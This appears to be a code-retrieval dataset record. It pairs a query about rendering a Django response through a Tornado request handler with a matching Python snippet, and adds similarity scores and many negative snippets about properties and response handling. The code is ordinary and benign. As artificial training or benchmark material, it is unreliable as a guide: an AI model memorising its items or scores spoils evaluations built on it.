Iterators would lose their state\n if isinstance(attr, collections.Iterator):\n raise ValueError(\"Iterators can't be lazy loaded\")\n serializable_state.pop('_' + lazy_property, None)\n return serializable_state\n setattr(dataset, '__getstate__', __getstate__)\n\n return dataset\n return wrap_dataset", "def lazyprop(fn):\n\n @property\n def _lazyprop(self):\n if not hasattr(self, _LAZY_PROP_VALUES):\n setattr(self, _LAZY_PROP_VALUES, {})\n lazy_props_dict = self.__dict__[_LAZY_PROP_VALUES]\n if fn.__name__ not in lazy_props_dict:\n lazy_props_dict[fn.__name__] = fn(self)\n return lazy_props_dict[fn.__name__]\n\n return _lazyprop", "def lazy(fn):\n attr_name = '_lazy_' + fn.__name__\n @property\n def _lazyprop(self):\n if not hasattr(self, attr_name):\n setattr(self, attr_name, fn(self))\n return getattr(self, attr_name)\n return _lazyprop", "def load(self):\n for prop in self.properties:\n try:\n value = getattr(self, prop)\n self._prop_dict[prop] = value\n except AttributeError as ate:\n pass", "def property_setup(self, properties):\n return properties", "def get_properties():", "def auto_attr(func):\r\n return OneTimeProperty(func)", "def _collect_properties(self):\n properties = {\n 'userid': self.user_id,\n 'title': self.get_fullname()\n }\n if not self.ogds_user:\n return properties\n\n for attribute_name in self.ogds_user_attributes:\n value = getattr(self.ogds_user, attribute_name)\n properties[attribute_name] = value\n return properties", "def init_attrs(self):\n raise NotImplementedError", "def populate(self, **kwargs):\n kwargs = _.omit(kwargs, Base.PUBLIC_PROPERTIES + ['key', 'id']) # We don't want to populate those properties\n kwargs = _.pick(kwargs, _.keys(self._properties)) # We want to populate only real model properties\n super(Base, self).populate(**kwargs)", "def useProperties(cls):\n def getter(name):\n def get(self):\n return self.property(name)\n return get\n def setter(name):\n def set(self, value):\n return self.setProperty(name, value)\n return set\n for name in iterProperties(cls):\n setattr(cls, name, property(getter(name), setter(name)))\n return cls", "def load_properties(self, meta):\n\t\t# doctype properties\n\t\tfor prop in doctype_properties:\n\t\t\tself.set(prop, meta.get(prop))\n\n\t\tfor d in meta.get(\"fields\"):\n\t\t\tnew_d = {\n\t\t\t\t\"fieldname\": d.fieldname,\n\t\t\t\t\"is_custom_field\": 
d.get(\"is_custom_field\"),\n\t\t\t\t\"is_system_generated\": d.get(\"is_system_generated\"),\n\t\t\t\t\"name\": d.name,\n\t\t\t}\n\t\t\tfor prop in docfield_properties:\n\t\t\t\tnew_d[prop] = d.get(prop)\n\t\t\tself.append(\"fields\", new_d)\n\n\t\tfor fieldname in (\"links\", \"actions\", \"states\"):\n\t\t\tfor d in meta.get(fieldname):\n\t\t\t\tself.append(fieldname, d)", "def _get_class_attributes(attributes, cls, properties, mapper_attrs, table_attributes):\n for attr in attributes:\n if attr.startswith('_'):\n continue\n if attr.endswith('_id'):\n continue\n if attr in ('metadata', 'query'):\n continue\n var = getattr(cls, attr)\n if callable(var):\n continue\n if isinstance(var, property):\n try:\n attr = '_' + attr\n var = getattr(cls, attr)\n properties.append(attr)\n except AttributeError as err:\n print('could not determin corresponding attribute for property {}'.format(var))\n continue\n if isinstance(var, InstrumentedAttribute):\n var = cast(InstrumentedAttribute, var)\n table_attributes[attr] = mapper_attrs[attr]", "def properties(self):\n raise NotImplementedError", "def properties(self):", "def properties(self):", "def properties(self):", "def get_properties(self):\n self.unimpl_base_class()", "def properties(self):\n pass", "def _properties(self) -> dict[str, dict[str, str]]:\n schema = self.schema(by_alias=False)\n if schema.get('properties') is not None:\n return schema.get('properties', {})\n return schema.get('definitions', {}).get(self.__class__.__name__, {}).get('properties', {})", "def getProperties():", "def prop(self, fn):\n if not callable(fn):\n fn = attrgetter(fn)\n self._keys.append(fn)\n self._sortKeys.append({})\n return self", "def create_property_on_class(self, cls, internal_name):\n if not self._use_custom_properties:\n if self._is_mutable:\n setter = partial(_setattr, internal_name)\n else:\n setter = None\n setattr(\n cls,\n self._name,\n property(\n partial(_getattr, internal_name),\n setter,\n None,\n self._description\n )\n )", "def properties(self, ctx: Context) -> Iterator[AnnotatedExpression]:\n if \"self\" in ctx.namespace:\n self_expr = ctx.namespace[\"self\"]\n if hasattr(self_expr.annotation.type, \"__annotations__\"):\n class_annotations = (\n self_expr.annotation.type.__annotations__\n ) # type: Mapping[str,Type]\n for attr_name, attr_type in class_annotations.items():\n yield AnnotatedExpression(\n ast.Attribute(\n value=ast.Name(id=\"self\", ctx=ast.Load()),\n attr=attr_name,\n ctx=ast.Load(),\n ),\n TypeAnnotation(attr_type, None),\n )", "def get_properties(self):\n return self.properties", "def pluck_attr(source: ObservableBase, prop: str) -> ObservableBase:\n\n return source.map(lambda x: getattr(x, prop))", "def _init_attributes(self):\n self.attr = {\n 'name': None,\n 'tags': [],\n 'openHours': None,\n 'type': None,\n 'parent': None,\n 'locationId': None,\n 'bannerAbbreviation': None,\n 'arcGisAbbreviation': None,\n 'geoLocation': None,\n 'geometry': None,\n 'summary': None,\n 'description': None,\n 'descriptionHtml': None,\n 'address': None,\n 'city': None,\n 'state': None,\n 'zip': None,\n 'county': None,\n 'telephone': None,\n 'fax': None,\n 'thumbnails': [],\n 'images': [],\n 'departments': [],\n 'website': None,\n 'sqft': None,\n 'calendar': None,\n 'campus': None,\n 'girCount': None,\n 'girLimit': False,\n 'girLocations': None,\n 'synonyms': [],\n 'bldgId': None,\n 'parkingZoneGroup': None,\n 'propId': None,\n 'adaParkingSpaceCount': None,\n 'motorcycleParkingSpaceCount': None,\n 'evParkingSpaceCount': None,\n 'weeklyMenu': 
None,\n 'notes': None,\n 'labels': {},\n 'steward': None,\n 'shape': {}\n }", "def __init__(self):\n self.properties = {}", "def proxied_attribute(local_attr, proxied_attr, doc):\n def fget(self):\n return getattr(getattr(self, local_attr), proxied_attr)\n def fset(self, value):\n setattr(getattr(self, local_attr), proxied_attr, value)\n def fdel(self):\n delattr(getattr(self, local_attr), proxied_attr)\n return property(fget, fset, fdel, doc)", "def __properties__(self) -> dict:\r\n parameters = [\r\n d for d in dir(self) if (d[0] != \"_\") and (d.count(\"set\") == 0)\r\n and (d.count(\"_c\") == 0) and (d.count(\"_f\") == 0)\r\n ]\r\n\r\n return self.__as_json__(parameters)" ]
[ "0.70922816", "0.6685102", "0.6428715", "0.6299822", "0.6247607", "0.5921087", "0.5776609", "0.5761453", "0.57289666", "0.56989306", "0.5629627", "0.56074035", "0.5563408", "0.55521804", "0.55443585", "0.55443585", "0.55443585", "0.5507907", "0.547553", "0.5448069", "0.5433604", "0.5412133", "0.5388402", "0.5375684", "0.5363826", "0.53331125", "0.53291065", "0.53186446", "0.5294933", "0.528696" ]
0.7106498
0
Render a Django response and finish up this request. You'll need to call this if the view function/method is a coroutine.
def render(self, response):
    logger.debug("TornadoRequest::render")
    response = self._handler.finish_response(self, response)
    logger.debug("response: Finished")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def finish_response(self, request, response):\n logger.debug(\"TornadoHandler::finish_response\")\n\n try:\n response = self._render_template(request, response)\n except Exception as e:\n return self._handle_response_exception(request, response, e)\n\n try:\n self._apply_response_middleware(request, response)\n except: # Any exception should be gathered and handled\n signals.got_request_exception.send(sender=self.__class__, request=request)\n response = self.handle_uncaught_exception(request, resolver, sys.exc_info())\n\n self._tornado_request_handler.django_finish_request(response)\n\n self._response_finished = True\n return response", "def render(self, request):\r\n response = LoudWSGIResponse(\r\n self._reactor, self._threadpool, self._application, request)\r\n response.start()\r\n return NOT_DONE_YET", "def serve(self, request):\n view = self.view.as_view()\n response = view(request)\n\n try:\n # HttpResponseRedirect does not have context_data\n\n response.context_data['page'] = self\n response.context_data['self'] = self\n\n except AttributeError:\n pass\n\n return response", "def finalize_response(self, request, response, *args, **kwargs):\n\t\t# Make the error obvious if a proper response is not returned\n\t\tassert isinstance(response, BaseResponse), (\n\t\t\t'Expected a `Response` object '\n\t\t\t'to be returned from the view, but received a `%s`'\n\t\t\t% type(response)\n\t\t)\n\t\treturn response", "def get_final_response(self,request,response):\n return response", "def process_response(self, request, response):\n return response", "def process_response(self, request, response):\n return response", "def render_response(self, *args, **kwargs):\n if self.template_name is not None:\n template = get_template(loader, self.template_name)\n self.response.write(template.render(**self.get_context(*args, **kwargs)))\n else:\n raise ValueError('No template provided.')", "def get_response(self, request):\n view = self.get_view()\n # Call its view with the request and this model.\n return view(request, flexible_page=self)", "def render_response(self, context, result):\n\t\tcontext.response = result\n\t\treturn True", "def respond(self, request):\n self.prepare(request)\n try:\n self.process(request)\n return self.get_response(request)\n finally:\n self.finalize()", "def process_response(self, request, response):\n\n # Cause dynamic responses to be rendered\n if isinstance(response, DynamicResponse):\n return response.render_response(request, response)\n\n return response", "def process_response(self, request, response):\n if request.headers.get('x-requested-with') == 'XMLHttpRequest':\n return render_to_json(response)\n return response", "def post(self, request, *args, **kwargs):\n return self.render_to_response(self.get_context_data())", "def render(self, *a, **kw):\r\n try:\r\n res = Wrapped.render(self, *a, **kw)\r\n if is_api():\r\n res = json_respond(res)\r\n elif self.space_compress:\r\n res = spaceCompress(res)\r\n c.response.content = res\r\n except NoTemplateFound, e:\r\n # re-raise the error -- development environment\r\n if g.debug:\r\n s = sys.exc_info()\r\n raise s[1], None, s[2]\r\n # die gracefully -- production environment\r\n else:\r\n abort(404, \"not found\")\r\n return c.response", "def render_to_response(self, context):\n\t\treturn self.get_json_response(self.convert_context_to_json(context))", "def render_to_response(self, context, **response_kwargs):\n return self.response_class(\n request = self.request,\n template = self.get_template_names(),\n context = 
context,\n **response_kwargs\n )", "def render(self, request):\n content = request.content.read()\n msg = json.loads(content)\n d = self.engine_bus.handleRequest(self.access_id, msg)\n d.addCallback(self._success, request)\n d.addErrback(self._fail, request)\n return server.NOT_DONE_YET", "def render_to_response(template, context, request, *args, **kwargs):\n from django.shortcuts import render_to_response as rtr\n from django.template import RequestContext\n return rtr(template, context, context_instance=RequestContext(request), *args, **kwargs)", "def make_response(self, request, response, **response_kwargs):\n while iscoroutine(response):\n response = yield from response\n\n if isinstance(response, StreamResponse):\n return response\n\n response_kwargs.setdefault('content_type', 'application/json')\n\n return Response(text=dumps(response), **response_kwargs)", "def render_to_response(self, context):\n return self.get_json_response(self.convert_context_to_json(context))", "def render_to_response(filename, context=None, request=None, mimetype=settings.DEFAULT_CONTENT_TYPE):\n rendered = render_to_string(filename, context, request)\n settings.timer.clear()\n return HttpResponse(rendered,mimetype=mimetype)", "def deferred_response(response, request):\n request.write(simplejson.dumps(response))\n request.finish()", "def render_to_response(self, context, **response_kwargs):\n if self.request.is_ajax():\n template = self.page_template\n else:\n template = self.get_template_names()\n return self.response_class(\n request=self.request,\n template=template,\n context=context,\n **response_kwargs\n )", "def _process_response(self, request, response):\n if http_utils.is_ajax(request) and hasattr(request, 'horizon'):\n queued_msgs = request.horizon['async_messages']\n if type(response) == http.HttpResponseRedirect:\n # Drop our messages back into the session as per usual so they\n # don't disappear during the redirect. Not that we explicitly\n # use django's messages methods here.\n for tag, message, extra_tags in queued_msgs:\n getattr(django_messages, tag)(request, message, extra_tags)\n if response['location'].startswith(settings.LOGOUT_URL):\n redirect_response = http.HttpResponse(status=401)\n # This header is used for handling the logout in JS\n redirect_response['logout'] = True\n if self.logout_reason is not None:\n utils.add_logout_reason(\n request, redirect_response, self.logout_reason,\n 'error')\n else:\n redirect_response = http.HttpResponse()\n # Use a set while checking if we want a cookie's attributes\n # copied\n cookie_keys = {'max_age', 'expires', 'path', 'domain',\n 'secure', 'httponly', 'logout_reason'}\n # Copy cookies from HttpResponseRedirect towards HttpResponse\n for cookie_name, cookie in response.cookies.items():\n cookie_kwargs = dict((\n (key, value) for key, value in cookie.items()\n if key in cookie_keys and value\n ))\n redirect_response.set_cookie(\n cookie_name, cookie.value, **cookie_kwargs)\n redirect_response['X-Horizon-Location'] = response['location']\n upload_url_key = 'X-File-Upload-URL'\n if upload_url_key in response:\n self._copy_headers(response, redirect_response,\n (upload_url_key, 'X-Auth-Token'))\n return redirect_response\n if queued_msgs:\n # TODO(gabriel): When we have an async connection to the\n # client (e.g. websockets) this should be pushed to the\n # socket queue rather than being sent via a header.\n # The header method has notable drawbacks (length limits,\n # etc.) 
and is not meant as a long-term solution.\n response['X-Horizon-Messages'] = json.dumps(queued_msgs)\n return response", "def json_response(self, request, *args, **kwargs):\n\n return HttpResponse(self.construct_json(),\n content_type='application/json',\n mimetype='application/json', status=self.status)", "def render_to_response(self, request, context, **response_kwargs):\n return TemplateResponse(\n request=request,\n template=self.get_template_name(),\n context=context,\n **response_kwargs\n )", "def render_to_response(self, context, **response_kwargs):\n return JsonResponse(context)", "def render_response(template, *args, **kwargs):\n\treturn render_template(template, *args, user=current_user(), **kwargs)", "def post(self, request, *args, **kwargs):\n return render(request, self.template_name, self.get_context_data(**kwargs))" ]
[ "0.734545", "0.7148183", "0.6868576", "0.6828342", "0.66384035", "0.6576349", "0.6576349", "0.6488101", "0.64071804", "0.63726956", "0.63658375", "0.6342019", "0.63327676", "0.6281047", "0.62706876", "0.62440646", "0.6232727", "0.61879945", "0.6183402", "0.6164196", "0.6162728", "0.6146056", "0.61459357", "0.6130997", "0.61192435", "0.60772055", "0.6066321", "0.6059683", "0.60548943", "0.60439533" ]
0.7349427
0
Convenience wrapper for the Tornado request's write() method.
def write(self, chunk):
    return self.tornado_request.write(chunk)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write(self, *args, **kwargs):\n\n self.response.out.write(*args, **kwargs)", "def write(self, *a, **kw):\n self.response.out.write(*a, **kw)", "def write(self, *a, **kw):\n self.response.out.write(*a, **kw)", "def write(self, *a, **kw):\n self.response.out.write(*a, **kw)", "def write(self, *a, **kw):\n self.response.out.write(*a, **kw)", "def write(self, *a, **kw):\n self.response.out.write(*a, **kw)", "def Write(self, request, global_params=None):\n config = self.GetMethodConfig('Write')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Write(self, request, global_params=None):\n config = self.GetMethodConfig('Write')\n return self._RunMethod(\n config, request, global_params=global_params)", "def write_request(self, request):\n msg = self.serialise_cbor_request(request)\n written = 0\n while written < len(msg):\n written += self.write(msg[written:])", "def stream(self, write, request):\n raise NotImplementedError(\"%s.stream\" % reflect.qual(self.__class__))", "def _make_http_request_write(self, path, *args, **kwargs):\n url = self.url_base + path\n self._invalidate_http_cache()\n return self._perform_http_request(url, *args, **kwargs)[2]", "def write(self, chunk):\r\n if not self.started_response:\r\n raise AssertionError(\"WSGI write called before start_response.\")\r\n \r\n if not self.sent_headers:\r\n self.sent_headers = True\r\n self.send_headers()\r\n \r\n if self.chunked_write and chunk:\r\n buf = [hex(len(chunk))[2:], \"\\r\\n\", chunk, \"\\r\\n\"]\r\n self.sendall(\"\".join(buf))\r\n else:\r\n self.sendall(chunk)", "def writeResponse(response):", "def write(fd, name, *args, version=None, **kwargs):\n\treturn access('write', fd, name, *args, version=version, **kwargs)", "def write( data ):", "def serialize_request(self, request, headers):\n content = self._write_content(request)\n headers.update({'Content-Length': str(len(content))})\n return content", "def base_write(self, write_method: Callable, data: DataDict,\n use_handle: bool):\n if use_handle:\n self._handle.seek(0)\n serialized = write_method(data, **self.kwargs)\n self._handle.write(serialized)\n self._handle.flush()\n os.fsync(self._handle.fileno())\n self._handle.truncate()\n else:\n write_method(self, data, **self.kwargs)", "def write(self, *args):\n\n self._write(self._out, *args)", "def __write(self, data):\n return self.__descriptor.write(data.encode(\"utf-8\") + b'\\n')", "def write():\n pass", "async def emit(self, data):\n if type(data) is not str:\n serialized_data = json.dumps(data)\n else:\n serialized_data = data\n try:\n self.write(f\"data: {serialized_data}\\n\\n\")\n await self.flush()\n except StreamClosedError:\n app_log.warning(\"Stream closed while handling %s\", self.request.uri)\n # raise Finish to halt the handler\n raise Finish()", "def write(self, arg, **kwargs):\r\n if hasattr(arg, 'seek'):\r\n self._tofile(arg, **kwargs)\r\n else:\r\n with open(arg, 'wb') as fid:\r\n self._tofile(fid, **kwargs)", "def writer(name, version=None, mimetype=None):\n\treturn _data_processor('write', name, version, mimetype)", "def write(self,data):\n self.body=self.body+data\n if end_of_header_search(self.body) >= 0:\n headers=self.headers\n if headers.has_key('content-length'):\n del headers['content-length']\n if not self.headers.has_key('content-type'):\n self.setHeader('content-type', 'text/html')\n self.insertBase()\n body=self.body\n self.body=''\n self.write=write=self.stdout.write\n try: self.flush=self.stdout.flush\n except: pass\n write(str(self))\n self._wrote=1\n 
write('\\n\\n')\n write(body)", "def write( chunk, callback=None ):", "def post(self, **kwargs):\n data = request.json\n return save_new_writer(data=data)", "def _write(self, data):\n self._writer.write(data)", "def write(data):", "def write(self, data):\n return self._write(self.wfile, data)", "def write(self, out):" ]
[ "0.7011142", "0.6603937", "0.6603937", "0.6603937", "0.6603937", "0.6603937", "0.6459584", "0.6459584", "0.6424561", "0.6364683", "0.57424295", "0.5591314", "0.5554613", "0.5515465", "0.5395379", "0.5374757", "0.5356486", "0.5350801", "0.5335824", "0.53176373", "0.52599496", "0.5257619", "0.52323526", "0.52159405", "0.5213933", "0.51957476", "0.5186017", "0.5185007", "0.51797754", "0.5171676" ]
0.7030209
0
Convenience wrapper for the Tornado request's finish() method.
def finish(self):
    return self.tornado_request.finish()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def RequestHandler_finish(self):\n if self.request._oboe_finish_ev and self.request._oboe_ctx and self.request._oboe_ctx.is_valid():\n ev = self.request._oboe_finish_ev\n ctx = self.request._oboe_ctx\n if hasattr(self, 'get_status'): # recent Tornado\n ev.add_info(\"Status\", self.get_status())\n elif hasattr(self, '_status_code'): # older Tornado\n ev.add_info(\"Status\", self._status_code)\n\n ev.add_edge(oboe.Context.get_default())\n ctx.report(ev)\n\n # clear the stored oboe event/metadata from the request object\n self.request._oboe_ctx = None\n self.request._oboe_finish_ev = None", "def finish_response(self, request, response):\n logger.debug(\"TornadoHandler::finish_response\")\n\n try:\n response = self._render_template(request, response)\n except Exception as e:\n return self._handle_response_exception(request, response, e)\n\n try:\n self._apply_response_middleware(request, response)\n except: # Any exception should be gathered and handled\n signals.got_request_exception.send(sender=self.__class__, request=request)\n response = self.handle_uncaught_exception(request, resolver, sys.exc_info())\n\n self._tornado_request_handler.django_finish_request(response)\n\n self._response_finished = True\n return response", "def onfinish( request ):", "def onfinish( request ):", "def AsyncHTTPClient_finish(request, callback=None, headers=None):\n if hasattr(callback, '_oboe_ctx'): # wrapped callback contains md\n ev = callback._oboe_ctx.create_event('exit', 'cURL') # adds edge to md\n if hasattr(request, '_oboe_ctx'): # add edge to entry event for this async HTTP call\n ev.add_edge(request._oboe_ctx)\n mdobj = callback\n\n elif hasattr(request, '_oboe_ctx'): # callback contains no metadata, but request obj does\n ev = request._oboe_ctx.create_event('exit', 'cURL')\n mdobj = request\n\n else: # no metadata found\n return\n\n if headers and hasattr(headers, 'get') and headers.get('X-Trace', None):\n response_md = headers.get('X-Trace')\n ev.add_edge_str(response_md) # add response X-Trace header\n\n mdobj._oboe_ctx.report(ev) # increments metadata in mdobj", "def done(self):\n ## All done with the request object\n self.closed = True\n self.d.callback('')", "def finish_request(self, request, client_address):\n\t\tself.RequestHandlerClass(request, client_address, self)", "def end_request(self, environ):\n pass", "def finish_successful_request(self):\n self.session_manager.finish_successful_request()", "def close_request(self, request):\n\t\tpass", "def finalize_response(self, request, response, *args, **kwargs):\n\t\t# Make the error obvious if a proper response is not returned\n\t\tassert isinstance(response, BaseResponse), (\n\t\t\t'Expected a `Response` object '\n\t\t\t'to be returned from the view, but received a `%s`'\n\t\t\t% type(response)\n\t\t)\n\t\treturn response", "def close_request(self, request):\n\t\trequest.close()", "def end(response):\n if isinstance(response.response, ClosingIterator):\n return response\n\n diff = time.time() - request.start\n del request.start\n\n if response.response:\n response.response[0] = response.response[0].replace('__EXECUTION_TIME__', '{:.3}'.format(diff))\n response.headers[\"content-length\"] = len(response.response[0])\n\n return response", "def done(self, request):\n raise NotImplementedError(\"Your %s class has not defined a done() \" \\\n \"method, which is required.\" \\\n % self.__class__.__name__)", "def cb_request_done(result):\n self._current_request = None\n return result", "def finish ( self ) :\n raise AbstractMethodException( self , 
\"finish\" )", "def finish(self) -> None:\n self.__exit__(None, None, None)", "def render(self, response):\n logger.debug(\"TornadoRequest::render\")\n response = self._handler.finish_response(self, response)\n logger.debug(\"response: Finished\")", "def exit(self) -> None:\n\n self.result = self.handle_success('finished-task')", "def end():\n\tdata = bottle.request.json\n\t#print(\"END:\", json.dumps(data))\n\treturn HTTPResponse(status=200)", "def finish(self):\n self.body.finish()", "def finish():", "def finish():", "def finish():", "def finish():", "def set_finish_callback( callback ):", "def set_finish_callback( callback ):", "def _request_finished_handler(self):\n handler = HandlerWrapper('.handlers:request_finished_handler', None)\n exc_handler = HandlerWrapper(self.get_setting('handler.exc'), handler)\n return exc_handler", "def handle_finished (self):\n\n print self.in_headers\n print self.in_cookies\n print self.content_type\n print self.content_encoding\n print self.response_code\n print self.is_allowing_persistence\n print self.content", "def onfinish():" ]
[ "0.6845464", "0.65772814", "0.6546038", "0.6546038", "0.64914596", "0.643756", "0.64001775", "0.6219688", "0.6184029", "0.6064755", "0.6025992", "0.5989794", "0.5957331", "0.5918375", "0.579136", "0.57792234", "0.5768139", "0.57536525", "0.57431555", "0.5708127", "0.569587", "0.5684539", "0.5684539", "0.5684539", "0.5684539", "0.56694967", "0.56694967", "0.56146973", "0.561312", "0.55677557" ]
0.7975853
0
Returns the equivalent of the HTTP request's SCRIPT_NAME header variable. If Apache mod_rewrite has been used, returns what would have been the script name prior to any rewriting (so it's the script name as seen from the client's perspective), unless the FORCE_SCRIPT_NAME setting is set (to anything).
def get_script_name(t_req):
    if settings.FORCE_SCRIPT_NAME is not None:
        return force_text(settings.FORCE_SCRIPT_NAME)
    # If Apache's mod_rewrite had a whack at the URL, Apache set either
    # SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any
    # rewrites. Unfortunately not every Web server (lighttpd!) passes this
    # information through all the time, so FORCE_SCRIPT_NAME, above, is still
    # needed.
    script_url = t_req.headers.get('SCRIPT_URL', '')
    if not script_url:
        script_url = t_req.headers.get('REDIRECT_URL', '')
    if script_url:
        path_info = t_req.headers.get('PATH_INFO', '')
        script_name = script_url[:-len(path_info)]
    else:
        script_name = t_req.headers.get('SCRIPT_NAME', '')
    # It'd be better to implement URI-to-IRI decoding, see #19508.
    # return script_name.decode(UTF_8)
    return script_name
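A hypothetical trace of the SCRIPT_URL/PATH_INFO slicing above, with made-up values:

# Suppose mod_rewrite set SCRIPT_URL = '/myapp/some/view'
# and PATH_INFO = '/some/view'. Then:
script_name = '/myapp/some/view'[:-len('/some/view')]
# script_name == '/myapp', the script name as the client saw it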
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getScriptname():\n return os.environ.get('SCRIPT_NAME', '')", "def get_current_request_hostname():\r\n hostname = None\r\n request = get_current_request()\r\n if request:\r\n hostname = request.META.get('HTTP_HOST')\r\n\r\n return hostname", "def get_wsgi_file_name(self):\n return self.wsgi", "def get_host(req):\n return req.META[\"HTTP_HOST\"].split(\":\")[0]", "def get_wsgi_full_file_name(self):\n return posixpath.join(self.get_wsgi_dir(), self.get_wsgi_file_name())", "def request_host(request):\n host = urlsplit(request.url).hostname\n if host == \"\":\n host = request.get_header(\"Host\", \"\").partition(\":\")[0]\n\n # remove port, if present\n return host.lower()", "def get_scriptname(fname):\n base = os.path.basename(fname)\n res = os.path.splitext(base)[0]\n return res", "def gethandlername(URL):\n match = re.search(\"/([a-zA-Z0-9_-]+)\\.prog($|/|\\?)\", URL)\n if not match:\n # Couldn't find the requested module\n raise404(\"Couldn't find a module name in URL \" + URL)\n return match.group(1)", "def host(self):\r\n return self._environ.get('HTTP_HOST', '')", "def get_uri_prefix() -> str:\n Config.__get()\n assert Config.__config is not None\n return Config.__config.get(\"wsgi\", \"uri_prefix\").strip()", "def get_host(request):\n return request.META[\"HTTP_HOST\"].split(\":\")[0]", "def host(self):\n return self._environ.get('HTTP_HOST', '')", "def getBaseURL():\n return getQualifiedURL(getScriptname())", "def gettoolname(request):\n uri = ''\n if request.uri:\n uri = request.uri\n else:\n uri = request.url\n return urllib.parse.urlparse(uri).path.split('/')[1]", "def get_raw_server_name():\n from google.appengine.api import app_identity\n return '%s.%s.appspot.com' % (os.environ[\n 'CURRENT_VERSION_ID'].split('.')[0], app_identity.get_application_id())", "def ServerHostName(self):\n if self.force_auto_sync:\n self.get('ServerHostName')\n return self._ServerHostName", "def get_http_path_prefix():\n return os.path.join(CONF.deploy.http_root, '')", "def get_filename(self, headers):\n header = headers.get('content-disposition')\n\n if header is not None:\n _, params = cgi.parse_header(header)\n filename = params.get('filename')\n else:\n try:\n filename = self.parsed.path.split('/')[-1]\n except IndexError:\n filename = None\n\n return filename if filename is not None else self.DEFAULT_FILENAME", "def org_apache_felix_http_name(self) -> ConfigNodePropertyString:\n return self._org_apache_felix_http_name", "def get_mod_name():\n return sys.argv[0].split(\"/\")[-1].split(\".py\")[0]", "def gethostname():\n if socket.gethostname().find('.') >= 0:\n host = socket.gethostname()\n else:\n host = socket.gethostbyaddr(socket.gethostname())[0]\n return host", "def sockname(self):\n return self.socket_.getsockname()", "def getsockname(self):\r\n return self.sock.getsockname()", "def getsockname(self):\n return self.sock.getsockname()", "def PyHiew_GetScriptFileName(script):\r\n return '%s\\\\%s.py' % (PYHIEW_PATH, script)", "def url_prefix(self):\n return self._url_prefix", "def get_siteprefix(self):\n return self.siteprefix", "def GetApacheServerHost():\n host = None\n # Gets (scheme, host, port) from ServerName directive.\n match = MatchPattern(\n GEHTTPD_CONF_PATH,\n r\"^ServerName\\s+(?:(https?)://)?\"\n r\"((?:[\\da-zA-Z-]+)(?:\\.(?:[\\da-zA-Z-]+)){1,5})(?::(\\d+))?\")\n\n if match and (match[1] not in [\"localhost\", \"127.0.0.1\"]):\n host = match[1]\n\n if not host:\n host = GetServerHost()\n\n assert host\n return host", "def get_hostname():\n return re.split(\"\\.\", 
env.host)[0]", "def get_script_name(self, locale: Locale | str | None = None) -> str | None:\n if locale is None:\n locale = self\n locale = Locale.parse(locale)\n return locale.scripts.get(self.script or '')" ]
[ "0.74698013", "0.64156264", "0.6333524", "0.5728996", "0.5704559", "0.551568", "0.5501407", "0.54212606", "0.5419497", "0.54038095", "0.5375227", "0.52965987", "0.5247907", "0.5221188", "0.5179678", "0.5173248", "0.5162168", "0.514716", "0.5140043", "0.5136708", "0.51301867", "0.50970536", "0.50841177", "0.50709295", "0.5064584", "0.5043065", "0.5040198", "0.5039459", "0.50316447", "0.50310695" ]
0.82943535
0
More proper boolean operator for easier reading.
return 1   Indicates a found listener
return 0   Indicates nobody listening
def is_listening(port):
    return not listening(port)
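A usage sketch, assuming listening() follows the shell convention of returning 0 when a listener is found (which is what the inversion above implies):

if is_listening(8080):
    print('port 8080 has a listener')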
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def isListening(self):\n if not self.proxy:\n self.proxy = self.session.service(\"ALExpressiveListening\")\n return self.proxy.isListening()", "def listening(self):\n return self._server is not None", "def available(self):\n from pyhs3 import STATE_LISTENING\n return self._connection.api.state == STATE_LISTENING", "async def listen(self, maddr: Multiaddr) -> bool:", "def listening(self, ctxt):\n return True", "def is_alive(self):\n if (self._s.fileno()>0 and self._running and self._listen):\n return True\n else:\n return False", "def open_listener(self):\n\n try:\n self.listener = Listener((self.host, self.port))\n self.startup_success = True\n log.info(\"listening on '%s', %s\", self.host, self.port)\n except:\n self.startup_success = False\n log.exception(\"Could not bind socket '%s', %s\", self.host, self.port)\n\n self.startup.set()\n return self.startup_success", "def start_a_listener():\n listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n listener.bind(('', 0))\n return listener, listener.getsockname()", "def status(self):\n pid = self.pid()\n if pid is None or not pid_exists(pid):\n return False\n\n process = Process(pid)\n try:\n for connection in process.connections():\n if connection.status == 'LISTEN' and \\\n connection.laddr[1] == self.port:\n return True\n except AccessDenied:\n return False\n\n return False", "def _check_rac_listener(cfg, warning=None, critical=None):\n bin_name = \"lsnrctl\"\n _check_attrs(cfg, [\"sid\", \"oh\"])\n bin_name = os.path.join(cfg.oh, \"bin\", bin_name)\n regex = re.compile(r'Instance \"{0}\\d*\", status READY, has 1 handler\\(s\\) for this service...'.format(cfg.sid))\n\n try:\n os.environ[\"ORACLE_HOME\"] = cfg.oh\n args = bin_name + \" status\"\n cp = subprocess.run(args, shell=True, check=True, stdout=subprocess.PIPE)\n if cp.stdout is None:\n print(\"None result from lsnrctl status\")\n return UNKNOWN\n out = str(cp.stdout, \"utf-8\")\n ready = False\n msg = \"Service {0} has 0 listener status is READY\".format(cfg.sid)\n for l in out.split(os.linesep):\n if regex.search(l.lstrip().rstrip()):\n ready = True\n msg = l\n break\n\n print(msg)\n return OK if ready else CRITICAL\n except subprocess.CalledProcessError as err:\n print(err.output)\n return UNKNOWN", "def udp_listening(port):\n return (\n subprocess.call(\n udp_listening_cmd(port).split(),\n stdin=DEVNULL,\n stdout=DEVNULL,\n stderr=DEVNULL,\n close_fds=True,\n )\n == 0\n )", "def is_port_listening(port):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n result = s.connect_ex((\"127.0.0.1\", port))\n return result == 0", "def start_a_listener():\n listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n listener.bind(('localhost', 0))\n return listener, listener.getsockname()", "def begin_listening(self):\n print(responses.STATUS_STARTING_TO_LISTEN)\n sockets = [self.english_sc, self.maori_sc, self.german_sc]\n\n try:\n incoming, outgoing, exceptions = select.select(sockets, [], [])\n\n if incoming[0] == self.english_sc:\n self.process_incoming(\n incoming[0], self.english_sc, self.ports['English'])\n return True\n\n 